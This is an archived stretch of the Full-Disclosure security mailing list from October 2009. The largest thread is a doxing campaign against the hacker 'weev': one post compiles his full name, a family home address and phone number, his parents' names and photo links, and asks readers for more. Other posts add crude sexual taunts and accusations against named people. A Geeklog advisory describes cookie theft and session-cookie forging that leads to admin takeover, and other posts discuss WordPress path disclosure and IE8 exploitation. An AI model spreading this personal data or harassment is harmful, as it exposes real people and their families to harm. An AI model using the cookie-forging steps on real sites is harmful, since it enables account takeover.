[Full-disclosure] So weev... Message-ID: <20091003014207.63286B00B5@smtp.hushmail.com> -----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1 > (Now disclosed to be known as Andrew Auernheimer)? Help want ... We interrupt momentarily to notify you that his name is Andrew Alan Escher Auernheimer. Kind of a funky set of middle names. We are envious. WINTERMUTE -----BEGIN PGP SIGNATURE----- Charset: UTF8 Note: This signature can be verified at https://www.hushtools.com/verify Version: Hush 3.0 wpwEAQMCAAYFAkrGq+8ACgkQAN7xmh8YPB0O/QP/T3j7eLraLZ/25JCR4mZEjOMbmXbU nbnYVxBtxDIl8dWg61hcx2jhAmSPL+w63rlzOqFGbhw08qqLWiE54tMMqwKLYS11OzEI YpPUFB5oCbMCpAOG6TC0n+8niU66fsiwaMBApUIKalbTlrlVLqqQvf+YgeKltG0MMfUB NPhLSis= =LSvk -----END PGP SIGNATURE----- From yirimyah at gmail.com Sat Oct 3 02:43:02 2009 From: yirimyah at gmail.com (dramacrat) Date: Sat, 3 Oct 2009 11:43:02 +1000 Subject: [Full-disclosure] So weev... In-Reply-To: References: Message-ID: <173d1e2f0910021843v8597155p44974d0e8bbaee91@mail.gmail.com> I wouldn't be too concerned if I was weev. A guy who uses phrases like *alleged suspect* and* likelihood chance* is after him! Oh dear, he must be going to accuse weev of being an *illegal criminal*! 2009/10/3 GOBBLES > This is about fighting crime. Not about putting your stuff into the alleged > suspect's mother. > > Please have some sense of courtesy and professionalism. > > *ISRAEL* > Internet Sleuth, Richard Anderson, > Electronic Lawyer > > > -------- Original Message -------- > From: BMF > To: GOBBLES > Cc: full-disclosure at lists.grok.org.uk > Subject: Re: [Full-disclosure] So weev... > Date: Fri, 2 Oct 2009 17:08:40 -0700 > > > On Fri, Oct 2, 2009 at 4:57 PM, GOBBLES wrote: > >> There is a strong likelihood chance we can get Andrew into prison for his >> criminal activity. >> > > Sweet! I love to send people to Federal "Pound me in the ass" Prison! While > Bubba is fudgin' this "weev" character I can be fudgin' his momma! > > > _______________________________________________ > Full-Disclosure - We believe in it. > Charter: http://lists.grok.org.uk/full-disclosure-charter.html > Hosted and sponsored by Secunia - http://secunia.com/ > -------------- next part -------------- An HTML attachment was scrubbed... URL: http://lists.grok.org.uk/pipermail/full-disclosure/attachments/20091003/d08e9840/attachment.html From wintermute at hush.com Sat Oct 3 02:55:08 2009 From: wintermute at hush.com (Wintermute) Date: Fri, 02 Oct 2009 20:55:08 -0500 Subject: [Full-disclosure] So weev... Message-ID: <20091003015508.6C589B00B5@smtp.hushmail.com> -----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1 We are not convinced; weev seems to have been concerned with net- >IRL identity mapping in the past: "seriously. we need a sysop faq that is sure to state that the only person we are allowed to mention when talking about ED ownership is joseph evers." -- weev, 20080531, correspondence "yes please scrub realnames from ED" -- weev, 20080531, correspondence We have reason to believe Andrew Alan Escher Auernheimer has done some things he would rather others did not know about. We will "keep you posted". WINTERMUTE On Fri, 02 Oct 2009 20:43:02 -0500 dramacrat wrote: >I wouldn't be too concerned if I was weev. > >A guy who uses phrases like *alleged suspect* and* likelihood >chance* is >after him! Oh dear, he must be going to accuse weev of being an >*illegal >criminal*! -----BEGIN PGP SIGNATURE----- Charset: UTF8 Version: Hush 3.0 Note: This signature can be verified at https://www.hushtools.com/verify wpwEAQMCAAYFAkrGrvwACgkQAN7xmh8YPB1kpAQAg0zlbaEQUwN26mkyCnVLkCHD3Dxa ACdXyKJ4Z/CiXaUs2vYfGUY3O1SgryygzRIN/pJTxr2ofejUkuGAr9MU1K+ayxEr00ir vbCnHRRkyjjZtLjMn9XsSdkuyKHXJCCc9vIUIXYxYo0jtoApvVVZkw00QFCe3FwEyJIY mNIfGHg= =E68p -----END PGP SIGNATURE----- From jal0h at hotmail.com Sat Oct 3 03:09:05 2009 From: jal0h at hotmail.com (Jaloh Smith) Date: Sat, 3 Oct 2009 02:09:05 +0000 Subject: [Full-disclosure] Geeklog <= v1.6.0sr2 - Remote File Upload Message-ID: ============================================================================== Geeklog <= v1.6.0sr2 - Remote File Upload Discovered: JaL0h Software Site: http://www.geeklog.net Dork: "By Geeklog" "Created this page in" +seconds +powered ============================================================================== Remote File Upload ================== Geeklog has several options to upload images. The image upload process does not validate the mime type of the upload. Geeklog trusts the mime type specified by the browser and also checks the file extension, both of which are very easy to spoof. Files with .jpg extensions can be uploaded, but these file can contain anything, like javascript or PHP code. Using FireFox you can upload any jpg extension and it will be accepted since FireFox sets the mime type based on file extension. Uploading usually requires that you first create a user account. Once an account is created, you can upload a user photo, which could take advantage of this vulnerability. Potential Abuse =============== Executable javascript can easily be uploaded. There are several XSS holes in many of the Geeklog plugins which could run the uploaded javascript. If a simple cookie stealing javascript were uploaded, it could be used to expose the Geeklog uid and password hash which is as good as having the actual password. Sample JavaScript document.write(''); Once the uid and password hash is known, you can set a cookie in your browser: geeklog=[uid]; password=[md5 hash]; which gives you instant access to everything the user has access to. If you expose an administrative account, you have full access to the admin panel where you can set the staticpages.PHP permission to true, then create a static page that will run any PHP script you desire, potentially exposing the entire server. The cookie exploit was originally documented by Nine:Situations:Group::bookoo http://www.milw0rm.com/exploits/8376 and remains unfixed. Successful exploitation requires the ability to execute the uploaded JavaScript. The Geeklog Forum program can be used as an attack vector since it does not properly validate many $_GET / $_POST variables. _________________________________________________________________ Windows Live: Make it easier for your friends to see what you?re up to on Facebook. http://www.microsoft.com/middleeast/windows/windowslive/see-it-in-action/social-network-basics.aspx?ocid=PID23461::T:WLMTAGL:ON:WL:en-xm:SI_SB_2:092009 -------------- next part -------------- An HTML attachment was scrubbed... URL: http://lists.grok.org.uk/pipermail/full-disclosure/attachments/20091003/38a777bd/attachment.html From redhowlingwolves at nc.rr.com Sat Oct 3 06:14:09 2009 From: redhowlingwolves at nc.rr.com (meandmine) Date: Sat, 03 Oct 2009 01:14:09 -0400 Subject: [Full-disclosure] n3td3v the new age martyr of the full-disclosure mailing list In-Reply-To: <20091002221627.D027EB00B5@smtp.hushmail.com> References: <20091002221627.D027EB00B5@smtp.hushmail.com> Message-ID: <4AC6DDA1.6000003@nc.rr.com> -----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1 full-censorship at hushmail.com wrote: > we're making n3td3v a martyr of the full-disclosure mailing list. > > join hands in a circle and ban the other trolls in the name of our > martyr. > > three cheers for our martyr!!! ban the trolls, ban the trolls, ban > the trolls!!! > > vulcanius wrote: >> Who is we? Weren't you calling for n3td3v to be allowed back not > long >> ago? Do you see the irony in your message? >> >> I know how you can get at least one troll off the list, > unsubscribe. >> >> wrote: >>> THE FULL-CENSORSHIP MOVEMENT >>> >>> OUR GOALS >>> >>> * we are a movement of security professionals who will complain >>> about every troll >>> >>> * we believe anybody who offends us should be banned >>> >>> * we will not stop until every troll is banned >>> > > _______________________________________________ > Full-Disclosure - We believe in it. > Charter: http://lists.grok.org.uk/full-disclosure-charter.html > Hosted and sponsored by Secunia - http://secunia.com/ > I'm so fed up with the crap on here, I'm gone. Talk all the shit you want, I want see it, thank god! -----BEGIN PGP SIGNATURE----- Version: GnuPG v1.4.6 (GNU/Linux) Comment: Using GnuPG with Mozilla - http://enigmail.mozdev.org/ iQEVAwUBSsbdoaSvjvL7s/z0AQLC7wgAkrQDhFa9ZZNsPsoLJ78eKnE5VXDp2cMG HkNuki+2suV7frIjJ9n4NLT5aLvC7i10aMdneXchYHrhA5QyKJeCo6HP+SYxyWhP 8/dINps0+4AGlCk5B/RWZdEjwrAT1RDBgZdCSUks9jte6nPV+11zcFoDtEDfnJo/ i5NoP0qzrqREJxDhRS8Q3fR1Ra6WIZXjgvMsgO6Pqtaw70c/a+Wc+U0bySJynlYn mBrfjoU+nFA9KS+yRKPMrtBBK/PjteQhCVnmwdEjmfeFfH85tF/RIMlIjCcVcv2t GVt1o9F0128sgoWKoslrgBnxgDaXyiLDgfZhlcRNlGpb6G0vmwGkcA== =X7bx -----END PGP SIGNATURE----- From mlistdarky at gmail.com Sat Oct 3 13:48:06 2009 From: mlistdarky at gmail.com (darky) Date: Sat, 03 Oct 2009 14:48:06 +0200 Subject: [Full-disclosure] Geeklog <= v1.6.0sr2 - Remote File Upload In-Reply-To: References: Message-ID: <4AC74806.6080902@gmail.com> > > Files with .jpg extensions can be uploaded, but these file can contain > anything, like javascript or PHP code. Using FireFox you can upload any > jpg extension and it will be accepted since FireFox sets the mime type > based on file extension. > > Uploading usually requires that you first create a user account. Once an > account is created, you can upload a user photo, which could take advantage > of this vulnerability. > Ok so this is not a remote file upload issue if you can only upload allowed files (not files with bad exts), this is just a feature that doesn't valid the mime type. This can help for another exploitation but you can't execute code directly at this point. > Potential Abuse > =============== > Executable javascript can easily be uploaded. There are several XSS holes in > many of the Geeklog plugins which could run the uploaded javascript. If a simple > cookie stealing javascript were uploaded, it could be used to expose the Geeklog > uid and password hash which is as good as having the actual password. > So you just upload a JS file in order to help you with the XSS ? > If you > expose an administrative account, you have full access to the admin panel > where you can set the staticpages.PHP permission to true, then create a > static page that will run any PHP script you desire, potentially exposing > the entire server. > Ok so here you have a remote code execution in the admin panel. > Successful exploitation requires the ability to execute the uploaded JavaScript. > The Geeklog Forum program can be used as an attack vector since it does not > properly validate many $_GET / $_POST variables. Could you give us some more details about these XSS vulnerabilities ? :) Cause all I see here is a RCE in the admin panel. You confirm that there are XSS but we don't have any details about them... From fernando at zerial.org Sat Oct 3 16:30:59 2009 From: fernando at zerial.org (Zerial.) Date: Sat, 03 Oct 2009 11:30:59 -0400 Subject: [Full-disclosure] [EquipoFraude] Full Path Disclosure in most wordpress' plugins [?] In-Reply-To: <4AC69F2A.7010507@hispasec.com> References: <4AC0C298.5050606@zerial.org> <4AC69F2A.7010507@hispasec.com> Message-ID: <4AC76E33.9010502@zerial.org> -----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1 Victor Antonio Torre Villahoz wrote: > This not only happens in the plugins, all files in wp-admin/import/ have > errors like it. > > I'm fix it using: > > if ( defined('WP_ADMIN') or defined('WP_USE_THEMES') ){ > ;//coninue > } > else{ > die(); > } I've received an email which contains a lot of files which are vulnerables to FPD: wp-admin/includes/admin.php wp-admin/includes/class-ftp-pure.php wp-admin/includes/class-ftp-sockets.php wp-admin/includes/class-wp-filesystem-direct.php wp-admin/includes/class-wp-filesystem-ftpext.php wp-admin/includes/class-wp-filesystem-ftpsockets.php wp-admin/includes/class-wp-filesystem-ssh2.php wp-admin/includes/comment.php wp-admin/includes/continents-cities.php wp-admin/includes/file.php wp-admin/includes/media.php wp-admin/includes/misc.php wp-admin/includes/plugin-install.php wp-admin/includes/plugin.php wp-admin/includes/schema.php wp-admin/includes/template.php wp-admin/includes/theme-install.php wp-admin/includes/update.php wp-admin/includes/upgrade.php wp-admin/includes/user.php Solution: if ( defined('WP_ADMIN') or defined('WP_USE_THEMES') ){ ;//coninue } else{ die("Oops! Don't run this script directly, n00b"); } //---- or if ( defined('ABSPATH')){ die("Oops! Don't run this script directly, n00b"); > > > Fernando A. Lagos B. escribi?: >> Exists an call to add_action() without validate with function_exists(). >> When I run the php script directly, I get the full path of wp installation. > >> Example: >> [+] http://www.marco2010.cl/wp-content/plugins/akismet/akismet.php >> [+] http://www.marco2010.cl/wp-content/plugins/hello.php > > >> Is a bug? Is a feature? > >> More details posted in my blog: >> http://blog.zerial.org/seguridad/vulnerabilidad-en-la-mayoria-de-los-plugins-para-wordpress/ >> (spanish) > > >> cheers. > > _______________________________________________ > Full-Disclosure - We believe in it. > Charter: http://lists.grok.org.uk/full-disclosure-charter.html > Hosted and sponsored by Secunia - http://secunia.com/ > > - -- Fernando A. Lagos Berardi - Zerial Desarrollador y Programador Web Seguridad Informatica Linux User #382319 Blog: http://blog.zerial.org Skype: erzerial Jabber: zerial at jabberes.org GTalk && MSN: fernando at zerial.org -----BEGIN PGP SIGNATURE----- Version: GnuPG v1.4.10 (GNU/Linux) Comment: Using GnuPG with Mozilla - http://enigmail.mozdev.org/ iEYEARECAAYFAkrHbjMACgkQIP17Kywx9JQzBwCfX/9P2TUFi2aoqhFuMHowJw7y oQ8AnAjwkug/QmJuYHEYJuLWz0DTiAl3 =QuHM -----END PGP SIGNATURE----- From yersinia.spiros at gmail.com Sat Oct 3 20:53:44 2009 From: yersinia.spiros at gmail.com (yersinia) Date: Sat, 3 Oct 2009 21:53:44 +0200 Subject: [Full-disclosure] Exploiting memory corruption vulnerabilities on Internet Explorer 8 In-Reply-To: References: <4AC4CA5A.80705@harris.com> Message-ID: On Thu, Oct 1, 2009 at 6:44 PM, Freddie Vicious wrote: > Yes, I am aware of the JVM and the Flash AVM heap spray techniques, no > DEP/ASLR there... But as you said, so far there's no known "catch-all" > technique against IE8. > Along with other security features ( > http://blogs.msdn.com/architecture/archive/2009/08/13/internet-explorer-8-rated-tops-against-malware-and-phishing-attacks.aspx) > this basicly means that IE8 is the most secure web browser nowadays? > > Depends. IMHO Non exists the more secure browser, anyway (not exists the more secure software, never ) . But exists the more secure env on which the browser run. There are some difference if i run firefox in windows xp and if i run run firefox within a selinux guest account under Fedora. > On Thu, Oct 1, 2009 at 8:27 AM, Jared DeMott wrote: > >> I'm not aware of any catch-all technique just for IE8, though there are >> a few common ones like return oriented programming. Application >> specific techniques are also common when third party extensions are >> involved. >> >> -- >> __________________________________________ >> Jared D. DeMott >> Principal Security Researcher >> >> > > > -- > Best wishes, > Freddie Vicious > http://twitter.com/viciousf > > _______________________________________________ > Full-Disclosure - We believe in it. > Charter: http://lists.grok.org.uk/full-disclosure-charter.html > Hosted and sponsored by Secunia - http://secunia.com/ > -------------- next part -------------- An HTML attachment was scrubbed... URL: http://lists.grok.org.uk/pipermail/full-disclosure/attachments/20091003/6b991799/attachment.html From mrxisaplant at hush.com Sat Oct 3 21:13:02 2009 From: mrxisaplant at hush.com (TheLearner) Date: Sat, 03 Oct 2009 20:13:02 +0000 Subject: [Full-disclosure] So weev... Message-ID: <20091003201302.73803B00B5@smtp.hushmail.com> I disagree. The usage of Alleged and Likelihood (sic) are qualifiers. Illegal criminal, however, is a double positive. I'd like to make a break in the conversation to say that Weev loves is a security risk not just to government but to businesses and people. Do the right thing. Submit all every last tidbit of information on weev to: http://tips.fbi.gov Not at all, I'm sure! On Sat, 03 Oct 2009 01:43:02 +0000 dramacrat wrote: >I wouldn't be too concerned if I was weev. > >A guy who uses phrases like *alleged suspect* and* likelihood >chance* is >after him! Oh dear, he must be going to accuse weev of being an >*illegal >criminal*! > >2009/10/3 GOBBLES > >> This is about fighting crime. Not about putting your stuff into >the alleged >> suspect's mother. >> >> Please have some sense of courtesy and professionalism. >> >> *ISRAEL* >> Internet Sleuth, Richard Anderson, >> Electronic Lawyer >> >> >> -------- Original Message -------- >> From: BMF >> To: GOBBLES >> Cc: full-disclosure at lists.grok.org.uk >> Subject: Re: [Full-disclosure] So weev... >> Date: Fri, 2 Oct 2009 17:08:40 -0700 >> >> >> On Fri, Oct 2, 2009 at 4:57 PM, GOBBLES mail.net> wrote: >> >>> There is a strong likelihood chance we can get Andrew into >prison for his >>> criminal activity. >>> >> >> Sweet! I love to send people to Federal "Pound me in the ass" >Prison! While >> Bubba is fudgin' this "weev" character I can be fudgin' his >momma! >> >> >> _______________________________________________ >> Full-Disclosure - We believe in it. >> Charter: http://lists.grok.org.uk/full-disclosure-charter.html >> Hosted and sponsored by Secunia - http://secunia.com/ >> From full-censorship at hushmail.com Sun Oct 4 02:15:00 2009 From: full-censorship at hushmail.com (full-censorship at hushmail.com) Date: Sun, 04 Oct 2009 02:15:00 +0100 Subject: [Full-disclosure] n3td3v banned from full-disclosure mailing list Message-ID: <20091004011500.550D6118036@smtp.hushmail.com> TheLearner wrote: > This will not stand. > > The Information Security community has absolutely no tolerance for > censorship. where have you been for the last 10 months? From mrxisaplant at hush.com Sun Oct 4 02:37:51 2009 From: mrxisaplant at hush.com (TheLearner) Date: Sun, 04 Oct 2009 01:37:51 +0000 Subject: [Full-disclosure] Weev, AKA Andrew Auernheimer [Fullinfo Doc(TM) revision #1] Message-ID: <20091004013751.1A33B118036@smtp.hushmail.com> Eyeballing Weev, An informative dossier. ============================= By FeelTheBurn Udmncrmnl Version ============================= Revision #1 Purpose ============================= You can edit this document and submit it back as a new revision. An effort by community citizens to expose this person. If you have any helpful knowledge about weev (even general) and have something to add, please reply with any editions. Abstract ============================= I noticed seclists.org was taking down information relating to the "doxing" of Andrew Auernheimer. - Original post http://seclists.org/fulldisclosure/2009/Oct/0013.html - Mirror (http://www.webcitation.org/5kD6O0OEd) Andrew is a troll in his early 20's who has hacked into various websites, harasses innocent people and companies, and actually dropped dox on this very list. Some of his victims (Which are on a list too long for even his associates to remember in entirity) consist of Rob Levin, Rich Kyanka's (lowtax) and Kathy Sierra's identity theft. Also, at the request of Girlvinyl (Sherrod DeGrippo) weev was able to nail Randi Harper (freebsdgirl) to the wall, still hocking up her name on google to this day. Andrew wants glory. He wants to be in the news. His remedy for distracting attention from his own flaws and ironies is the age-old "blame it on the jews". For him, he doesn't try to use it in a sarcastic way, merely pointing out absurb anti-semitism exists, he uses in this way to say something so extreme any attempt of criticizing him stops. In general, a puppy that wants love, but apparently can't be fixed. A Michael Crook. Real Identity ============================= - First name: Andrew - Last name: Auernheimer (mispelled as Aurenheimer sometimes) - Middle name: Alan Escher - Full name: Andrew Alan Escher Auernheimer DOB ============================= We need this! Past schools ============================= We need this! Known address ============================= Family 2038 W Grace St Richmond, VA 23220 Criminal / 0day / Spam / Scam PO Box 61359 Sunnyvale, CA 94088 San Francisco, Los Angeles areas of California You can google his PO Box address (where he does biz from) and see complaints about fraud. Known Aliases ============================= - Weev - Wbeelsoi - Uchiha Weevlos - Weevlar - Andrew wbeelsoi - Andrew weevlos - The iProhet - TheiProphet - The-iProphet Known Affiliations ============================= - Bantown - Buttes - EFnet #down - SASS (Something Awful Sycophant Squad) - Encyclopedia Dramatica - SealPac Known Enemies ============================= Organizations: - Something Awful - FBI - JDL - Possibly banks - Any law enforcement agency he knows him - Any jewish civil rights group that knows him (Know more? http://tips.fbi.gov) Name: - Dennis Fetcho - Kathy Sierra - Rob Levin - Richard Kyanka (lowtax) - FreeBSDGirl Known business affiliations ============================= Sealpac. Richmond, VA Photo ============================= - http://img.waffleimages.com/239fb622e4e5188627f39af8045575a70182f8c7 /569px-Internet_business.jpg / http://img8.imageshack.us/img8/7586/569pxinternetbusiness.jpg / http://imgur.com/V5hkG.jpg Known publicity stunts ============================= - Toorcon2111, Cybercrime Full URL: http://video.google.com/videoplay?docid=- 5643217366887354926&ei=iOzHSvzBOpbWrQKvlu2KDg&q=andrew+wbeelsoi TinyURL: http://tinyurl.com/auernheimercrime - LiveJournal hacking - NYTimes "Mawebulence" Expose Full URL: http://www.nytimes.com/2008/08/03/magazine/03trolls- t.html?_r=1&hp&oref=slogin Tiny URL: http://tinyurl.com/auernheimernytimes - He is also taking credit for Amazon hack of 2009. However this has not been confirmed - Corrupt: www.corrupt.org/act/interviews/weev - Public naming by JewishReview Full URL: http://www.jewishreview.org/local/Police-question- two-men-about-threats-to-Jewish-community TinyURL: http://tinyurl.com/auernheimer Archival: http://www.webcitation.org/5jnPBPyHG Family =================== Phone number: (804) 355-2889 Mother - Name: Catherine Auernheimer - Affiilations: Richmond PTA, Democratic Party - Alias: Alyse - Photograph: http://imgur.com/AQpSd.jpg / (http://img19.imageshack.us/img19/1967/aqpsd.jpg) / (http://img.waffleimages.com/41c1f9036d350871dbedf177ffd1109cf3bc6ab 8/aqpsd.jpg) / (http://hosting11.imagecross.com/image-hosting-th- 16/953aqpsd.jpg) / (http://www.freeimagehosting.net/uploads/af64fe986f.jpg) / (http://www.uploadgeek.com/thumb-CA81_4AC55843.jpg) / (http://www.imagehuge.com/out.php/t16155_aqpsd.jpg) / (http://images.imagenonline.com/img_a190867.jpg) / (http://www.desiupload.com/out.php/t325733_aqpsd.jpg) Father - Name: Mark Auernheimer - Affiliations: SealPac - Photograph: http://imgur.com/CEaNX.jpg / (http://img19.imageshack.us/img19/4673/ceanx.jpg) / (http://img.waffleimages.com/35414c5ec9e246bd42f2e4372abe51f836ed686 7/ceanx.jpg) / (http://www.uploadgeek.com/thumb-A304_4AC5594B.jpg) / (http://www.freeimagehosting.net/uploads/6db22e9e83.jpg) / (http://hosting11.imagecross.com/image-hosting-th-16/6430dad.jpg) / (http://www.desiupload.com/out.php/t325734_dad.jpg) / (http://www.imagehuge.com/out.php/i16156_dad.jpg) / (http://images.imagenonline.com/img_a190870.jpg) Not posting name or pictures of the brother and sister in law again. Other pertinent information =============================- Meltdown post after his public naming: - Source: http://weev.livejournal.com/368013.html - Archival: http://www.webcitation.org/5jnP71qsD Also weev posts his IRL name+handle on - http://www.jimgilliam.com/2004/08/oreillys_smear_campaign_in_quickti me.php. - Archival: http://www.webcitation.org/5jnPc0pNy http://whois.domaintools.com/sealpac-usa.com - Archival: http://www.webcitation.org/5jnT7EULI - Related to http://www.sealpacusa.com? Weev online ============================== - http://www.encyclopediadramatica.com/index.php/weev - http://weev.livejournal.com - http://the-iprophet.org - http://theiprophet.blip.tv - http://www.weev.net Email ============================= - gluttony at gmail.com Legal Notice ============================= - http://tips.fbi.gov You don't have to give your identity if you don't want to (even if you're a victim). You have a right to an attorney if you wish to speak with them above weev. If you don't want them to know your linkage with weev, send anonymous tip + some form of evidence (best you can muster) to substantiate the lead Licensing ============================= This document is licensed under the GFDL. Open source intelligence. http://www.gnu.org/copyleft/fdl.html History ============================= 10 / 3 / 2009 - Initial revision by GOBBLES Security From full-censorship at hushmail.com Sun Oct 4 02:53:43 2009 From: full-censorship at hushmail.com (full-censorship at hushmail.com) Date: Sun, 04 Oct 2009 02:53:43 +0100 Subject: [Full-disclosure] =?utf-8?q?_Weev=2C_=09AKA_Andrew_Auernheimer_?= =?utf-8?q?=5BFullinfo_Doc=28TM=29_revision_=231=5D?= Message-ID: <20091004015343.95209B00B5@smtp.hushmail.com> TheLearner wrote: > Andrew is a troll in his early 20's who has hacked into various > websites, harasses innocent people and companies Have you never had a parking ticket or a telling off by the school mistress for smoking pot behind the bike shed? There are criminals everywhere, who do *bad* things, you trying to appeal to the FBI on an international mailing list, where the main concern is *cyber terrorism* isn't the way to go. If you have a complaint about this stuff contact your local law enforcement office. Nobody gives a fuck here, we're all counter-terrorism folks. From mrxisaplant at hush.com Sun Oct 4 03:13:22 2009 From: mrxisaplant at hush.com (TheLearner) Date: Sun, 04 Oct 2009 02:13:22 +0000 Subject: [Full-disclosure] =?utf-8?q?Weev=2C_=09AKA_Andrew_Auernheimer_=5B?= =?utf-8?q?Fullinfo_Doc=28TM=29_revision_=231=5D?= Message-ID: <20091004021322.E697B28039@smtp.hushmail.com> Ah, pardon then. Didn't mean to insult the intelligence community. On Sun, 04 Oct 2009 01:53:43 +0000 full-censorship at hushmail.com wrote: >TheLearner wrote: >> Andrew is a troll in his early 20's who has hacked into various >> websites, harasses innocent people and companies > >Have you never had a parking ticket or a telling off by the school > >mistress for smoking pot behind the bike shed? > >There are criminals everywhere, who do *bad* things, you trying to > >appeal to the FBI on an international mailing list, where the main > >concern is *cyber terrorism* isn't the way to go. > >If you have a complaint about this stuff contact your local law >enforcement office. > >Nobody gives a fuck here, we're all counter-terrorism folks. From notshadowgamers at googlemail.com Sun Oct 4 03:56:07 2009 From: notshadowgamers at googlemail.com (Probably Shadowgamers) Date: Sun, 4 Oct 2009 03:56:07 +0100 Subject: [Full-disclosure] Weev, AKA Andrew Auernheimer [Fullinfo Doc(TM) revision #1] In-Reply-To: <20091004013751.1A33B118036@smtp.hushmail.com> References: <20091004013751.1A33B118036@smtp.hushmail.com> Message-ID: > http://img8.imageshack.us/img8/7586/569pxinternetbusiness.jpg / lol irony From fred.vicious at gmail.com Sun Oct 4 04:32:27 2009 From: fred.vicious at gmail.com (Freddie Vicious) Date: Sat, 3 Oct 2009 20:32:27 -0700 Subject: [Full-disclosure] Exploiting memory corruption vulnerabilities on Internet Explorer 8 In-Reply-To: <3fa2f5bb0910011255w380c49b6pdfd3eb1a14095e97@mail.gmail.com> References: <4AC4CA5A.80705@harris.com> <3fa2f5bb0910011255w380c49b6pdfd3eb1a14095e97@mail.gmail.com> Message-ID: Yeah that's prrety obvious that there's one way or another to bypass DEP and ASLR but if you chose not to share it and don't have anything useful to say, it'll be better not to say anything. On Thu, Oct 1, 2009 at 12:55 PM, Berend-Jan Wever wrote: > FYI: ASLR & DEP can be bypassed on x86, there's just nothing public at the > moment. > > Cheers, > > SkyLined > > Berend-Jan Wever > http://skypher.com/SkyLined > > > > > On Thu, Oct 1, 2009 at 6:44 PM, Freddie Vicious wrote: > >> Yes, I am aware of the JVM and the Flash AVM heap spray techniques, no >> DEP/ASLR there... But as you said, so far there's no known "catch-all" >> technique against IE8. >> Along with other security features ( >> http://blogs.msdn.com/architecture/archive/2009/08/13/internet-explorer-8-rated-tops-against-malware-and-phishing-attacks.aspx) >> this basicly means that IE8 is the most secure web browser nowadays? >> >> On Thu, Oct 1, 2009 at 8:27 AM, Jared DeMott wrote: >> >>> I'm not aware of any catch-all technique just for IE8, though there are >>> a few common ones like return oriented programming. Application >>> specific techniques are also common when third party extensions are >>> involved. >>> >>> -- >>> __________________________________________ >>> Jared D. DeMott >>> Principal Security Researcher >>> >>> >> >> >> -- >> Best wishes, >> Freddie Vicious >> http://twitter.com/viciousf >> >> _______________________________________________ >> Full-Disclosure - We believe in it. >> Charter: http://lists.grok.org.uk/full-disclosure-charter.html >> Hosted and sponsored by Secunia - http://secunia.com/ >> > > -- Best wishes, Freddie Vicious http://twitter.com/viciousf -------------- next part -------------- An HTML attachment was scrubbed... URL: http://lists.grok.org.uk/pipermail/full-disclosure/attachments/20091003/5bdff419/attachment.html From full-censorship at hushmail.com Sun Oct 4 04:44:41 2009 From: full-censorship at hushmail.com (full-censorship at hushmail.com) Date: Sun, 04 Oct 2009 04:44:41 +0100 Subject: [Full-disclosure] n3td3v mentioned in a book? Message-ID: <20091004034441.CCBC928039@smtp.hushmail.com> if this guy is mentioned in a book and we banned him? http://f0rb1dd3n.com/links.php i'm calling for a serious review of whats going on with the ban list. From gobbles1337 at Safe-mail.net Sun Oct 4 07:36:56 2009 From: gobbles1337 at Safe-mail.net (GOBBLES) Date: Sun, 4 Oct 2009 02:36:56 -0400 Subject: [Full-disclosure] Weev, AKA Andrew Auernheimer [Fullinfo Doc(TM) revision #1] Message-ID: One that that struck me as ironic about Encyclopedia Dramatica and Sherrod DeGrippo ordering hits on people who get a rise on her, she wants hard revenge. For a person who runs a site that makes embarrassing nightmares come true, she sure can't stand much heat herself. She took the GNAA phreaking her, and ended up becoming no better than the people who spooked her. Thing is, she's hiding behind a federal law as a portal provider. Isn't their an exception is when the owner's participates in the content environment? She also plays the shell game with Joseph Evers. And you don't know whether she's lying and handing out logs to law enforcement without subpoena's (informing for cash, she's jobless besides selling shirts, which can't even pay the server bills let alone a mortgage). Regardless, this doesn't make her immune to civil torts. She probably has some fat ass pockets from being on some corrupt fed's payroll. Sickening. Randi Harper is an example of how Sherrod DeGrippo, owner of Encyclopedia Dramatica, exhibits control on the flow of the website's informatoin. In a sense, if an attorney was able to muster it up proof, the safe harbor "Shields" of girlvinyl's space ship may have an opening in them. If these shields were to go down, this site would just be hammered. ED wasn't an LLC since a years or so ago, so it was still someone's site... Just saying. http://encyclopediadramatica.com/index.php/Sektie Archive: http://www.webcitation.org/5kGadccIg This lawless libertarian hellhole has got to end here. Looks like a darkmarket for trolls. Whatever the case, it encourages mean-spiritedness and is almost traumatic in the culture it fosters. Its almost like the projects, it draws in the worst crowd, and even if she is snitching, she's keeping the info up while people suffer. -------- Original Message -------- From: "TheLearner" Apparently from: full-disclosure-bounces at lists.grok.org.uk To: full-disclosure at lists.grok.org.uk Subject: [Full-disclosure] Weev,AKA Andrew Auernheimer [Fullinfo Doc(TM) revision #1] Date: Sun, 04 Oct 2009 01:37:51 +0000 > Eyeballing Weev, An informative dossier. > ============================= > By FeelTheBurn Udmncrmnl > > Version > ============================= > Revision #1 > > Purpose > ============================= > You can edit this document and submit it back as a new revision. > > An effort by community citizens to expose this person. If you > have any helpful knowledge about weev (even general) and have > something to add, please reply with any editions. > > Abstract > ============================= > I noticed seclists.org was taking down information relating to the > "doxing" of Andrew Auernheimer. > - Original post > http://seclists.org/fulldisclosure/2009/Oct/0013.html > - Mirror (http://www.webcitation.org/5kD6O0OEd) > > Andrew is a troll in his early 20's who has hacked into various > websites, harasses innocent people and companies, and actually > dropped dox on this very list. Some of his victims (Which are on a > list too long for even his associates to remember in entirity) > consist of Rob Levin, Rich Kyanka's (lowtax) and Kathy Sierra's > identity theft. Also, at the request of Girlvinyl (Sherrod > DeGrippo) weev was able to nail Randi Harper (freebsdgirl) to the > wall, still hocking up her name on google to this day. > > Andrew wants glory. He wants to be in the news. His remedy for > distracting attention from his own flaws and ironies is the age-old > "blame it on the jews". > > For him, he doesn't try to use it in a sarcastic way, merely > pointing out absurb anti-semitism exists, he uses in this way to > say something so extreme any attempt of criticizing him stops. > > In general, a puppy that wants love, but apparently can't be > fixed. A Michael Crook. > > Real Identity > ============================= > - First name: Andrew > - Last name: Auernheimer (mispelled as Aurenheimer sometimes) > - Middle name: Alan Escher > - Full name: Andrew Alan Escher Auernheimer > > DOB > ============================= > We need this! > > Past schools > ============================= > We need this! > > Known address > ============================= > Family > 2038 W Grace St > Richmond, VA 23220 > > Criminal / 0day / Spam / Scam > PO Box 61359 > Sunnyvale, CA 94088 > > San Francisco, Los Angeles areas of California > > You can google his PO Box address (where he does biz from) and > see complaints about fraud. > > Known Aliases > ============================= > - Weev > - Wbeelsoi > - Uchiha Weevlos > - Weevlar > - Andrew wbeelsoi > - Andrew weevlos > - The iProhet > - TheiProphet > - The-iProphet > > Known Affiliations 